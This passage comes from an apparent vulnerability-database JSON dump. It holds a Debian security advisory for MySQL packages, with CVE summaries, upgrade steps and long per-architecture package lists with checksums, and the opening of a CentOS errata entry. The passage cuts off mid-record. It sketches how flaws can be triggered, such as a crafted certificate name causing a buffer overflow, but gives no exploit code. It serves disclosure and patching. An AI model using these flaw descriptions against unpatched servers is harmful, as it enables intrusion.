DIRECTORY or INDEX DIRECTORY arguments that are originally associated\nwith pathnames without symlinks, and that can point to tables created at\na future time at which a pathname is modified to contain a symlink to a\nsubdirectory of the MySQL data home directory.\n\n\nCVE-2009-4484\n\nMultiple stack-based buffer overflows in the CertDecoder::GetName function\nin src/asn.cpp in TaoCrypt in yaSSL before 1.9.9, as used in mysqld, allow\nremote attackers to execute arbitrary code or cause a denial of service\n(memory corruption and daemon crash) by establishing an SSL connection and\nsending an X.509 client certificate with a crafted name field.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 5.0.32-7etch12\n\nFor the stable distribution (lenny), these problems have been fixed in\nversion 5.0.51a-24+lenny3\n\nThe testing (squeeze) and unstable (sid) distribution do not contain\nmysql-dfsg-5 anymore.\n\nWe recommend that you upgrade your mysql-dfsg-5.0 packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian (oldstable)\n- ------------------\n\nOldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.dsc\n Size/MD5 checksum: 1128 4887f5693757fbbc2584e86ab5e91bf3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.diff.gz\n Size/MD5 checksum: 315292 3d1c00f7b70032c11803fa391bee026a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz\n Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch12_all.deb\n Size/MD5 checksum: 48912 f937a118691e4325dac3a5a8e98eeb50\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch12_all.deb\n Size/MD5 checksum: 55892 6f34fbec1b8e451172ebd24f80439a9e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch12_all.deb\n Size/MD5 checksum: 46842 daa1649e464ebdbbd54170fb571782ea\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 1947910 6e23852721ab3b2a95d1b3113a533212\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 48900 c53c847af88a0423a09b9f68ba261859\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 8906528 64427684814af516902d10adb5c85de2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 8406242 204adae2eab5bfb665728ea7257631f0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_alpha.deb\n Size/MD5 checksum: 27248640 ee4b566619b0e560dcbf0632f8b0cc0e\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 1832552 84dba4bf6dfb24e13f4077e04d0c3475\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 25812188 31a0ce355b2c04ac098cf88594903744\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 48892 7af6aaca5c209bc9035be7d70784e9cb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 7549932 60e9a964ad08a8da5b2ea3f9102bead7\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_amd64.deb\n Size/MD5 checksum: 7373492 bcf1f20eb6e6a973348a70628b1f4c4c\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 1749396 bdd8b56e6fcd449a95fa84557be2a36c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 48944 a1eefc9dc4f1b06dc273e3a9e8bb15b0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 25391008 274f4ba0bc48cbaad699d13f18d890ed\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 7209164 361da5227a960f85c4ff9e7940e0c48c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_arm.deb\n Size/MD5 checksum: 6929398 7dd6fa8d51380dbd14733d9a412a22ed\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 8054922 1f896596ed2155bbb303170d5c58c52b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 48944 a588f3af5d0ff21ab4b40c81d1e6fc6c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 27197414 0d83d649dc99199513a1db73707f24f6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 1923360 1cb59886260894b0d22f2a51a192de50\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_hppa.deb\n Size/MD5 checksum: 8008532 93aaf8278a886dcba497aa9e2bb6293e\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 1795330 545b9a1f38f32aabacec4a5269e0aef4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 7193656 1755e4d988b95b31afdac22af89b8336\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 48944 6f8c556248dfb80e251bb4985b266a8a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 25359554 03d2005576588e2c02274fcffe42d955\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_i386.deb\n Size/MD5 checksum: 6976660 97d2e827f13ed9d35fce8467ca2b9efa\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 9740464 ab1ab10891736c731e456a3b177a2312\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 10344966 66e944be1b43f145243c27f57850d196\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 48896 57f5afd3c27d68ba80a8739c5604095c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 30405338 3dda87502fa124a4a5d5005c81e738c4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_ia64.deb\n Size/MD5 checksum: 2116718 da6a3ae401c77062478f2fd020435d29\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 25849668 0c94d38f290a9ed10a2edbe5ea3e741b\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 48902 0c47a91385eef6956f214bfb22ed1b48\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 7643768 e2b5b36f68cef57f9311723496b159b0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 7565666 08d656eaee1e93290058e63f90b11fd6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_mipsel.deb\n Size/MD5 checksum: 1790838 5a763673b2f69c5c7b99093f83dca05e\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 7526456 177c37f69f3b0ac0b0190a1f6b30974d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 48952 4043f7b2094834103a474398a8662dcc\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 26316574 fb4938e1a2d923c61e4a7d022fd09453\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 7572330 24a85e6c00e7706cd0d86be06aa2b4df\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_powerpc.deb\n Size/MD5 checksum: 1832552 fe2b6a7aa7655f4dd3533256e1d6c1cd\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 7016770 3e210b7a8f29c3249debffb84925cccb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 25549876 c93a3c01ad19a0c1ee67f2735d27ddf2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 48892 17f1009dbde6d24660ece46896a4e3c7\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 7162030 5dcf1cdc5747381a87d983ffd785131e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_sparc.deb\n Size/MD5 checksum: 1798414 c2a754cb9699ed08630984d32a0e0681\n\nDebian (stable)\n- ---------------\n\nStable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny3.dsc\n Size/MD5 checksum: 1746 e2f47c4a8b255f1ecebfca3416a9bd06\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a.orig.tar.gz\n Size/MD5 checksum: 17946664 6fae978908ad5eb790fa3f24f16dadba\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny3.diff.gz\n Size/MD5 checksum: 379840 3383e2cd99f1a1108d9afc942ada9234\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a-24+lenny3_all.deb\n Size/MD5 checksum: 61638 f95c22084e5fe701749eb775dcb72fca\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a-24+lenny3_all.deb\n Size/MD5 checksum: 55124 4ace4e9ed13e673babf77e095f732fc3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a-24+lenny3_all.deb\n Size/MD5 checksum: 52928 9c459e3fd6a4d26d61ebd53c6ff59fc2\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 2017374 9cfa50e93ff4eb076c4b279db28590b2\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 28323504 497b285f781bab661e872958db2706fa\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 8921890 69a8ae8d4b8c65ba91ccd0f85c974eb3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_alpha.deb\n Size/MD5 checksum: 9069206 210e61b74049dd98ac2ac22d35cf87bf\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 27159426 5969018772991a4d3ec674a892f3eca3\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 8207634 de959e4ec57baeb625a1b787957f1b4e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 7586020 5c3999c91d005b454e2b186c57d05532\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_amd64.deb\n Size/MD5 checksum: 1905900 16f42105a813df0dc3ff86310bd617db\n\narmel architecture (ARM EABI)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 26217720 8ac12229994f083d8d0fe61e7b21447c\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 7255210 1411c1f593184806f334c5115d5e5b1e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 1783326 4939777b25fdcf7d2dc5512cfe79e45a\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_armel.deb\n Size/MD5 checksum: 7647988 0b5878b88bbbdccb50191c1624c9430e\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 8429602 dd8e26cc1d2dc822570645ea76bb8c8e\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 27882774 27f249a50e587c912e9c981257971c07\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 8167562 758f37139ed34abcb8c6b73f481e7883\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_hppa.deb\n Size/MD5 checksum: 1959060 6991ac7e53bc11c32f72a2fddb4bc7e1\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 7200822 2e2aaa0abb27d2704b40595faac5b483\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 1860538 f50bcc91b4aa22b2861cd9e7d672aa16\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 26654932 0bbb282a6496724b9113e84bb3af8d58\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_i386.deb\n Size/MD5 checksum: 7785150 d0feb6f30b7aa4a8225ffd3e3fcb536f\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 2186408 287a20525b59ac1fd1f0164dabc01fde\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 9933436 edd18fc5e20ed97d9b42b64427dde5a4\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 10914030 9bd4e889ddf9d3794629bf3bd644e28d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_ia64.deb\n Size/MD5 checksum: 31432284 5d78f5b72f7e105598c2ff77d3336986\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 7775656 b773580d6eb7f3c270394ae8bd46eb85\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 7721124 346332bf620a57af88f1495758b617fb\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 1810420 82c04ce1c097c08c17fff616a4507aa6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_mipsel.deb\n Size/MD5 checksum: 26332894 7dcba45bd26831928b7a7dc989ece59b\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 1917890 a8181910ac284e74b82ac1f5bd0bf4af\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 7615402 f57057aab219c296febad2b1dbd71292\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 27312266 57d56f008e598595c89a87dd8fcfcd85\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_powerpc.deb\n Size/MD5 checksum: 8161690 96b710801fade82a7a0d2cb11f5b1357\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 2031780 33ab4b2fb41707110c214ba7412e6b6d\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 8227402 9af8be2781006662773b51cfaa348db6\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 7698110 9e844e96ebac4a0256f219f7eb921b78\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_s390.deb\n Size/MD5 checksum: 28104580 4a0ea6408ca35135353c26e4504f9233\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 26813192 43180d48e10662a3f2f1bdef087a1c18\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 7137808 a00a7b49b780235f55d9dcb80bda12b0\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 7755776 22c7fd28be510233e2da5d61e56c8762\n http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_sparc.deb\n Size/MD5 checksum: 1869120 342fc5e565b995da31edcf71797bd40e\n\n\n These files will probably be moved into the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 1, "reporter": "Debian", "published": "2010-02-14T12:29:12", "title": "[SECURITY] [DSA-1997-1] New mysql-dfsg-5.0 packages fix several vulnerabilities", "type": "debian", "enchantments": {"score": {"modified": "2018-10-16T22:14:55", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2009-4019", "CVE-2009-4484"], "modified": "2010-02-14T12:29:12", "id": "DEBIAN:DSA-1997-1:38D19", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2010/msg00037.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:24:36", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0109.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-bench-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-bench", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-bench-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-bench", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-test-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-test", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-devel-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-5.0.77-4.el5_4.2.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-5.0.77-4.el5_4.2.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-server-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-server", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-server-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql-server", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-5.0.77-4.el5_4.2.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "packageFilename": "mysql-test-5.0.77-4.el5_4.2.x86_64.rpm", "packageName": "mysql-test", "arch": "x86_64", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0109\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was discovered that the MySQL client ignored certain SSL certificate\nverification errors when connecting to servers. A man-in-the-middle\nattacker could use this flaw to trick MySQL clients into connecting to a\nspoofed MySQL server. (CVE-2009-4028)\n\nNote: This fix may uncover previously hidden SSL configuration issues, such\nas incorrect CA certificates being used by clients or expired server\ncertificates. This update should be carefully tested in deployments where\nSSL connections are used.\n\nA flaw was found in the way MySQL handled SELECT statements with subqueries\nin the WHERE clause, that assigned results to a user variable. A remote,\nauthenticated attacker could use this flaw to crash the MySQL server daemon\n(mysqld). This issue only caused a temporary denial of service, as the\nMySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n\nWhen the \"datadir\" option was configured with a relative path, MySQL did\nnot properly check paths used as arguments for the DATA DIRECTORY and INDEX\nDIRECTORY directives. An authenticated attacker could use this flaw to\nbypass the restriction preventing the use of subdirectories of the MySQL\ndata directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n(CVE-2009-4030)\n\nNote: Due to the security risks and previous security issues related to the\nuse of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\ndepending on this feature should consider disabling it by adding\n\"symbolic-links=0\" to the \"[mysqld]\" section of the \"my.cnf\" configuration\nfile. In this update, an example of such a configuration was added to the\ndefault \"my.cnf\" file.\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/016527.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-March/016528.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\nmysql-test\n\n**Upstream details at:**\n", "edition": 1, "reporter": "CentOS Project", "published": "2010-03-01T18:43:17", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "mysql security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "modified": "2010-03-01T18:43:17", "href": "http://lists.centos.org/pipermail/centos-announce/2010-March/016527.html", "id": "CESA-2010:0109", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-04T13:00:02", "references": ["https://rhn.redhat.com/errata/RHSA-2013-0121.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-5.0.95-3.el5.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-test-5.0.95-3.el5.i386.rpm", "packageName": "mysql-test", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-bench-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-bench", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-devel-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-server-5.0.95-3.el5.i386.rpm", "packageName": "mysql-server", "arch": "i386", "operator": "lt"}, {"OS": 